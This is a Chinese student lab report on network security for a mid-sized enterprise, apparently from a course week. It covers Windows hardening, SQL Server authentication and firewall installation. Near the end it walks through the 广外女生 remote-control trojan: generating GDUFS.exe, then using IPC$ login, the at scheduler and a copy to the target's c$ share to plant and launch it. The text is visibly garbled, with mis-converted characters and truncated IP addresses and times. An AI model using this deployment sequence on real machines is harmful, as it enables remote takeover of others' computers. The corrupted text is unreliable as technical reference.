【企業(yè)網(wǎng)絡(luò)】網(wǎng)絡(luò)信息安全報(bào)告

XX中型企業(yè)網(wǎng)平安網(wǎng)絡(luò)信息平安報(bào)告實(shí)驗(yàn)?zāi)康募耙笤搶Ｖ艿哪繕?biāo)是讓學(xué)生掌握網(wǎng)絡(luò)平安的根本框架，網(wǎng)絡(luò)平安的根本理論。以及了解計(jì)算機(jī)網(wǎng)絡(luò)平安方面的管理、配置和維護(hù)。本課程要求在理論教學(xué)上以必需夠用為原那么，應(yīng)盡量防止過(guò)深過(guò)繁的理論探討，重在理解網(wǎng)絡(luò)平安的根本框架，網(wǎng)絡(luò)平安的根本理論。掌握數(shù)據(jù)加密、防火墻技術(shù)、入侵檢測(cè)技術(shù)以及學(xué)習(xí)網(wǎng)絡(luò)病毒防治。了解Windows2000的平安、Web的平安、網(wǎng)絡(luò)平安工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學(xué)生對(duì)計(jì)算機(jī)的使用有一定了解〔了解Windows的使用，具有鍵盤操作和文件處理的根底〕，并已經(jīng)掌握計(jì)算機(jī)網(wǎng)絡(luò)的根本原理。專周內(nèi)容平安需求分析〔1〕網(wǎng)絡(luò)平安問(wèn)題主要集中在對(duì)效勞器的平安保護(hù)、防黑客和病毒、重要網(wǎng)段的保護(hù)及管理平安上。因此，我們必須采取相應(yīng)的平安措施杜絕平安隱患，其中應(yīng)該做到：公開效勞器的平安保護(hù)防止黑客從外部攻擊入侵檢測(cè)與監(jiān)控病毒防護(hù)數(shù)據(jù)平安保護(hù)網(wǎng)絡(luò)的平安管理〔2〕解決網(wǎng)絡(luò)平安問(wèn)題的一些要求A、大幅度地提高系統(tǒng)的平安性〔重點(diǎn)是可用性和可控性〕；B、保持網(wǎng)絡(luò)原有的特點(diǎn)，即對(duì)網(wǎng)絡(luò)的協(xié)議和傳輸具有良好的透明性，能透明接入，無(wú)需更改網(wǎng)絡(luò)設(shè)置；C、易于操作、維護(hù)，并便于自動(dòng)化管理，而不增加或少增加附加操作；D、盡量不影響原網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)，同時(shí)便于系統(tǒng)及系統(tǒng)功能的擴(kuò)展；E、平安保密系統(tǒng)具有較好的性能價(jià)格比。一次性投資，可以長(zhǎng)期使用；F、平安產(chǎn)品具有合法性，及經(jīng)過(guò)國(guó)家有關(guān)管理部門的認(rèn)可或認(rèn)證；〔3〕系統(tǒng)平安目標(biāo)A、建立一套完整可行的網(wǎng)絡(luò)平安與網(wǎng)絡(luò)管理策略；B、將內(nèi)部網(wǎng)絡(luò)、公開效勞器網(wǎng)絡(luò)和外網(wǎng)進(jìn)行有效隔離，防止與外部網(wǎng)絡(luò)直接通信；C、建立網(wǎng)站各主機(jī)和效勞器的平安保護(hù)措施，保證他們的系統(tǒng)平安；D、加強(qiáng)合法用戶的訪問(wèn)認(rèn)證，同時(shí)將用戶的訪問(wèn)權(quán)限控制在最低限度；E、全面監(jiān)視對(duì)公開效勞器的訪問(wèn)，及時(shí)發(fā)現(xiàn)和拒絕不平安的操作和黑客攻擊行為；F、加強(qiáng)對(duì)各種訪問(wèn)的審計(jì)工作，詳細(xì)記錄對(duì)網(wǎng)絡(luò)、公開效勞器的訪問(wèn)行為，形成完整的系統(tǒng)日志；網(wǎng)絡(luò)拓?fù)渚W(wǎng)絡(luò)平安的根本內(nèi)容根本網(wǎng)絡(luò)命令A(yù)、ping命令：ping–tIP，向指定的計(jì)算機(jī)不停的發(fā)送數(shù)據(jù)包，按Ctr+Break快捷鍵可以查看統(tǒng)計(jì)信息并繼續(xù)運(yùn)行，按Ctr+C可中止運(yùn)行。B、Tracert命令：tracertIP顯示從本地計(jì)算機(jī)到目標(biāo)效勞器所經(jīng)過(guò)的計(jì)算機(jī)：C、pathping除了顯示路由外，還提供325S的分析，計(jì)算喪失包的%操作系統(tǒng)平安A、屏蔽不需要的效勞組件開始——程序——管理工具——效勞出現(xiàn)以下窗口：然后在該對(duì)話框中選中需要屏蔽的程序，并單擊右鍵，然后選擇“停止〞命令，同時(shí)將“啟動(dòng)類型〞設(shè)置為“手動(dòng)〞或“已禁用〞，這樣就可以對(duì)指定的效勞組進(jìn)行屏蔽了。B、關(guān)閉默認(rèn)共享：“開始〞——“程序〞——“管理工具〞——“效勞〞——“Server〞數(shù)據(jù)庫(kù)系統(tǒng)平安A、使用平安的帳號(hào)策略和Windows認(rèn)證模式

由于SQLServer不能更改sa用戶名稱，也不能刪除這個(gè)超級(jí)用戶，所以，我們必須對(duì)這個(gè)帳號(hào)進(jìn)行最強(qiáng)的保護(hù)，當(dāng)然，包括使用一個(gè)非常強(qiáng)壯的密碼，最好不要在數(shù)據(jù)庫(kù)應(yīng)用中使用sa帳號(hào)，只有當(dāng)沒(méi)有其它方法登錄到SQLServer實(shí)例(例如，當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時(shí)才使用sa?？梢孕陆⒁粋€(gè)擁有與sa一樣權(quán)限的超級(jí)用戶來(lái)管理數(shù)據(jù)庫(kù)。平安的帳號(hào)策略還包括不要讓管理員權(quán)限的帳號(hào)泛濫。

SQLServer的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。在任何可能的時(shí)候，應(yīng)該對(duì)指向SQLServer的連接要求Windows身份驗(yàn)證模式。

Windows認(rèn)證模式比混合模式更優(yōu)越，原因在以下：

1)它通過(guò)限制對(duì)MicrosoftWindows用戶和域用戶帳戶的連接，保護(hù)SQLServer免受大局部Internet工具的侵害。

2)效勞器將從Windows平安增強(qiáng)機(jī)制中獲益，例如更強(qiáng)的身份驗(yàn)證協(xié)議以及強(qiáng)制的密碼復(fù)雜性和過(guò)期時(shí)間。

3)使用Windows認(rèn)證，不需要將密碼存放在連接字符串中。存儲(chǔ)密碼是使用標(biāo)準(zhǔn)SQLServer登錄的應(yīng)用程序的主要漏洞之一。

4)Windows認(rèn)證意味著你只需要將密碼存放在一個(gè)地方。

要在SQLServer的EnterpriseManager安裝Windows身份驗(yàn)證模式，步驟操作：展開效勞器組——右鍵點(diǎn)擊效勞器——然后點(diǎn)擊“屬性〞——在平安性選項(xiàng)卡的身份驗(yàn)證中——點(diǎn)擊“僅限Windows〞。網(wǎng)絡(luò)防火墻工具：紅墻主機(jī)網(wǎng)絡(luò)防火墻安裝1.具體操作如下：

第一步：將“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻〞的安裝光盤插入驅(qū)動(dòng)器，運(yùn)行根目錄下的Setup文件來(lái)運(yùn)行其安裝程序，進(jìn)入“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻安裝〞窗口；第二步：在“歡送安裝愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻〞對(duì)話框中，單擊“下一步〞按鈕；第三步：在“軟件許可協(xié)議〞對(duì)話框，接受協(xié)議點(diǎn)擊“是〞；第四步：點(diǎn)擊“是〞按鈕，出現(xiàn)顯示您計(jì)算機(jī)的相關(guān)信息，即判斷是否可以安裝本軟件；第五步：?jiǎn)螕簟跋乱徊建暟粹o，出現(xiàn)“選擇目標(biāo)位置〞對(duì)話框；第六步：在該對(duì)話框中，單擊“瀏覽〞按鈕，并在“選擇文件夾〞對(duì)話框中選擇盤符作為驅(qū)動(dòng)器，再指定相應(yīng)的文件夾及路徑，然后單擊“確定〞按鈕；第七步：?jiǎn)螕簟跋乱徊建暟粹o，出現(xiàn)“選擇安裝程序名稱〞對(duì)話框，您可自定義程序名稱；第八步：?jiǎn)螕簟跋乱徊建暟粹o，系統(tǒng)開始復(fù)制文件；第九步：進(jìn)入“紅墻主機(jī)網(wǎng)絡(luò)防火墻配置〞窗口，作出是否運(yùn)行“紅墻應(yīng)用程序掃描系統(tǒng)〞的選擇后，點(diǎn)擊“完成〞。相關(guān)設(shè)置：告警設(shè)置：系統(tǒng)提供了兩種情況下的告警，即需要系統(tǒng)告警和不需要系統(tǒng)告警，您可據(jù)需要選取告警設(shè)置。點(diǎn)擊主界面中的“規(guī)那么管理〞按鈕，彈出相應(yīng)窗口，如下列圖：網(wǎng)絡(luò)監(jiān)控中心：網(wǎng)絡(luò)攻擊工具：“廣外女生〞它的根本功能有：文件管理方面有上傳，下載，刪除，改名，設(shè)置屬性，建立文件夾和運(yùn)行指定文件等功能；注冊(cè)表操作方面：全面模擬WINDOWS的注冊(cè)表編輯器，讓遠(yuǎn)程注冊(cè)表編輯工作有如在本機(jī)上操作一樣方便；屏幕控制方面：可以自定義圖片的質(zhì)量來(lái)減少傳輸?shù)臅r(shí)間，在局域網(wǎng)或高網(wǎng)速的地方還可以全屏操作對(duì)方的鼠標(biāo)及鍵盤，就像操縱自己的計(jì)算機(jī)一樣；遠(yuǎn)程任務(wù)管理方面，可以直觀地瀏覽對(duì)方窗體，隨意殺掉對(duì)方窗體或其中的控件；其他功能還有郵件IP通知等。主要步驟：首先運(yùn)行“gwg.exe〞，出現(xiàn)如圖窗口：選中“效勞端設(shè)置〞，生成“GDUFS.exe〞木馬：然后將“GDUFS.exe〞復(fù)制到自己的C盤中，再根據(jù)一些命令把“GDUFS.exe〞復(fù)制到目標(biāo)主機(jī)的盤中，再進(jìn)行運(yùn)行。目標(biāo)主機(jī)的IP：8具體步驟及命令：“開始〞——“運(yùn)行〞——“cmd〞命令：netuse\\8\ipc$123/user:administrator與目標(biāo)主機(jī)之間建立聯(lián)系命令：nettime\\8獲取目標(biāo)主機(jī)的時(shí)間命令：at\\808:21netsharec$=c:與目標(biāo)主機(jī)的C盤建立通道命令：copyc:\GDUFS.exe\\8\c$復(fù)制“GDUFS.exe〞文件到目標(biāo)主機(jī)的C盤中：命令：810:49c:\GDUFS.exe指定“GDUFS.exe〞在目標(biāo)主機(jī)中什么時(shí)候運(yùn)行。

專周小結(jié)：通過(guò)這次網(wǎng)絡(luò)平安專周，我不僅僅是學(xué)到了很多知識(shí)，更是透徹的理解到了網(wǎng)絡(luò)平安對(duì)生活已經(jīng)將來(lái)工作的意義。網(wǎng)絡(luò)平安分為軟件網(wǎng)絡(luò)平安和硬件網(wǎng)絡(luò)平安。一般我們說(shuō)的網(wǎng)絡(luò)平安就是軟件上的網(wǎng)絡(luò)平安，即局域網(wǎng)，互聯(lián)網(wǎng)平安。網(wǎng)絡(luò)平安又分為內(nèi)網(wǎng)平安和外網(wǎng)平安。在內(nèi)外網(wǎng)平安中，內(nèi)網(wǎng)平安那么是重中之重。畢竟是家賊難防。據(jù)不完全統(tǒng)計(jì)，全國(guó)因?yàn)閮?nèi)網(wǎng)平安的問(wèn)題，至少每年算是幾億美元。所以，網(wǎng)絡(luò)平安特別重要。至于在將來(lái)的工作中，我們也要嚴(yán)格尊市網(wǎng)絡(luò)設(shè)備管理原那么和使用秩序，對(duì)設(shè)備進(jìn)行統(tǒng)一管理專人負(fù)責(zé)，嚴(yán)格要求